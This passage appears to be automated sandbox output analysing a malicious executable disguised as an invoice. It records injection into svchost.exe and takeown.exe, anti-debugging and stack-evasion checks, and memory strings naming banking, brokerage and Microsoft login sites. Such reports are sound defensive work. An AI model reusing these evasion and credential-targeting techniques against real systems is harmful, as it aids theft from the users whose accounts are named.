Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00413A8F push es; iretd	6_2_00413A9E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00401430 push ds; retf	6_2_004014D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0040154E push esi; iretd	6_2_00401557
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_004015BF push ds; retf	6_2_00401600
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041A6EB push cs; ret	6_2_0041A6EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0041EF2A push edi; iretd	6_2_0041EF2D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_00402FF0 push eax; ret	6_2_00402FF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0340225F pushad ; ret	6_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034027FA pushad ; ret	6_2_034027F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034309AD push ecx; mov dword ptr [esp], ecx	6_2_034309B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0340283D push eax; iretd	6_2_03402858
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0340135E push eax; iretd	6_2_03401369
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_034E225F pushad ; ret	10_2_034E27F9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_034E27FA pushad ; ret	10_2_034E27F9
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_035109AD push ecx; mov dword ptr [esp], ecx	10_2_035109B6
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_034E283D push eax; iretd	10_2_034E2858
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_034E135E push eax; iretd	10_2_034E1369
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B20A9C push es; iretd	10_2_02B20AAB
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B30A7F push esi; retf	10_2_02B30A8F
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B30BFF push esp; iretd	10_2_02B30C00
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B209BE push esp; ret	10_2_02B20A17
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B25060 push eax; retf	10_2_02B25061
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B271D3 push edi; iretd	10_2_02B271D4

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007348D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		1_2_007348D7
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007B5376 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		1_2_007B5376

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00753187 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_00753187

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	API/Special instruction interceptor: Address: 18D3234
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECD324
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECD7E4
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECD944
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECD504
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECD544
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECD1E4
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CED0154
Source: C:\Windows\SysWOW64\takeown.exe	API/Special instruction interceptor: Address: 7FFB2CECDA44

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0347096E rdtsc

6_2_0347096E

Source: C:\Windows\SysWOW64\takeown.exe

Window / User API: threadDelayed 9829

Jump to behavior

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	API coverage: 4.6 %
Source: C:\Windows\SysWOW64\svchost.exe	API coverage: 0.6 %
Source: C:\Windows\SysWOW64\takeown.exe	API coverage: 2.6 %

Source: C:\Windows\SysWOW64\takeown.exe TID: 1292	Thread sleep count: 143 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 1292	Thread sleep time: -286000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 1292	Thread sleep count: 9829 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe TID: 1292	Thread sleep time: -19658000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe TID: 6956	Thread sleep time: -85000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe TID: 6956	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe TID: 6956	Thread sleep time: -52500s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe TID: 6956	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Program Files (x86)\GRQTIYeJjmKLEuRCQnrkwbCSqsGraPSoAafQJhYxEWRfZZZ\b7xVJvvK.exe TID: 6956	Thread sleep time: -35000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\takeown.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\takeown.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_0079445A
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079C6D1 FindFirstFileW,FindClose,	1_2_0079C6D1
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_0079C75C
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0079EF95
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_0079F0F2
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0079F3F3
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_007937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_007937EF
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_00793B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_00793B12
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_0079BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_0079BCBC
Source: C:\Windows\SysWOW64\takeown.exe	Code function: 10_2_02B2C380 FindFirstFileW,FindNextFileW,FindClose,	10_2_02B2C380

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007349A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

1_2_007349A0

Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 1f2Wt16K.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 1f2Wt16K.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 1f2Wt16K.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: takeown.exe, 0000000A.00000003.1494734995.0000000003181000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: F1Fw2CvmcibK1GOhr.exe
Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 1f2Wt16K.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: takeown.exe, 0000000A.00000002.3723139760.000000000308E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: 1f2Wt16K.10.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: b7xVJvvK.exe, 0000000B.00000002.3724390492.00000000013C9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 1f2Wt16K.10.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 1f2Wt16K.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 1f2Wt16K.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 1f2Wt16K.10.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 1f2Wt16K.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 1f2Wt16K.10.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 1f2Wt16K.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 1f2Wt16K.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 1f2Wt16K.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: takeown.exe, 0000000A.00000003.1513914294.0000000002FD0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: F1Fw2CvmcibK1GOhr.exex
Source: 1f2Wt16K.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 1f2Wt16K.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231\|UE
Source: 1f2Wt16K.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 1f2Wt16K.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
Source: firefox.exe, 0000000D.00000002.1803996722.0000022794E6C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll<<

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

API call chain: ExitProcess graph end node

graph_1-101258

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\takeown.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_0347096E rdtsc

6_2_0347096E

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 6_2_004172E3 LdrLoadDll,

6_2_004172E3

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_007A3F09 BlockInput,

1_2_007A3F09

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00733B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

1_2_00733B3A

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00765A7C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

1_2_00765A7C

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe

Code function: 1_2_00734B37 LoadLibraryA,GetProcAddress,

1_2_00734B37

Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_018D3500 mov eax, dword ptr fs:[00000030h]	1_2_018D3500
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_018D34A0 mov eax, dword ptr fs:[00000030h]	1_2_018D34A0
Source: C:\Users\user\Desktop\Invoice Remittance ref20250226.exe	Code function: 1_2_018D1E70 mov eax, dword ptr fs:[00000030h]	1_2_018D1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B2349 mov eax, dword ptr fs:[00000030h]	6_2_034B2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]	6_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]	6_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]	6_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B035C mov ecx, dword ptr fs:[00000030h]	6_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]	6_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B035C mov eax, dword ptr fs:[00000030h]	6_2_034B035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034FA352 mov eax, dword ptr fs:[00000030h]	6_2_034FA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D8350 mov ecx, dword ptr fs:[00000030h]	6_2_034D8350
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0350634F mov eax, dword ptr fs:[00000030h]	6_2_0350634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D437C mov eax, dword ptr fs:[00000030h]	6_2_034D437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h]	6_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h]	6_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0346A30B mov eax, dword ptr fs:[00000030h]	6_2_0346A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342C310 mov ecx, dword ptr fs:[00000030h]	6_2_0342C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03450310 mov ecx, dword ptr fs:[00000030h]	6_2_03450310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03508324 mov eax, dword ptr fs:[00000030h]	6_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03508324 mov ecx, dword ptr fs:[00000030h]	6_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03508324 mov eax, dword ptr fs:[00000030h]	6_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03508324 mov eax, dword ptr fs:[00000030h]	6_2_03508324
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EC3CD mov eax, dword ptr fs:[00000030h]	6_2_034EC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A3C0 mov eax, dword ptr fs:[00000030h]	6_2_0343A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]	6_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]	6_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]	6_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034383C0 mov eax, dword ptr fs:[00000030h]	6_2_034383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B63C0 mov eax, dword ptr fs:[00000030h]	6_2_034B63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h]	6_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h]	6_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE3DB mov ecx, dword ptr fs:[00000030h]	6_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034DE3DB mov eax, dword ptr fs:[00000030h]	6_2_034DE3DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D43D4 mov eax, dword ptr fs:[00000030h]	6_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034D43D4 mov eax, dword ptr fs:[00000030h]	6_2_034D43D4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034403E9 mov eax, dword ptr fs:[00000030h]	6_2_034403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0344E3F0 mov eax, dword ptr fs:[00000030h]	6_2_0344E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034663FF mov eax, dword ptr fs:[00000030h]	6_2_034663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h]	6_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h]	6_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342E388 mov eax, dword ptr fs:[00000030h]	6_2_0342E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345438F mov eax, dword ptr fs:[00000030h]	6_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0345438F mov eax, dword ptr fs:[00000030h]	6_2_0345438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03428397 mov eax, dword ptr fs:[00000030h]	6_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03428397 mov eax, dword ptr fs:[00000030h]	6_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03428397 mov eax, dword ptr fs:[00000030h]	6_2_03428397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B8243 mov eax, dword ptr fs:[00000030h]	6_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034B8243 mov ecx, dword ptr fs:[00000030h]	6_2_034B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0350625D mov eax, dword ptr fs:[00000030h]	6_2_0350625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342A250 mov eax, dword ptr fs:[00000030h]	6_2_0342A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03436259 mov eax, dword ptr fs:[00000030h]	6_2_03436259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EA250 mov eax, dword ptr fs:[00000030h]	6_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034EA250 mov eax, dword ptr fs:[00000030h]	6_2_034EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434260 mov eax, dword ptr fs:[00000030h]	6_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434260 mov eax, dword ptr fs:[00000030h]	6_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_03434260 mov eax, dword ptr fs:[00000030h]	6_2_03434260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342826B mov eax, dword ptr fs:[00000030h]	6_2_0342826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_034E0274 mov eax, dword ptr fs:[00000030h]	6_2_034E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0342823B mov eax, dword ptr fs:[00000030h]	6_2_0342823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0343A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 6_2_0343A2C3 mov eax, dword ptr fs:[00000030h]	6_2_0343A2C3
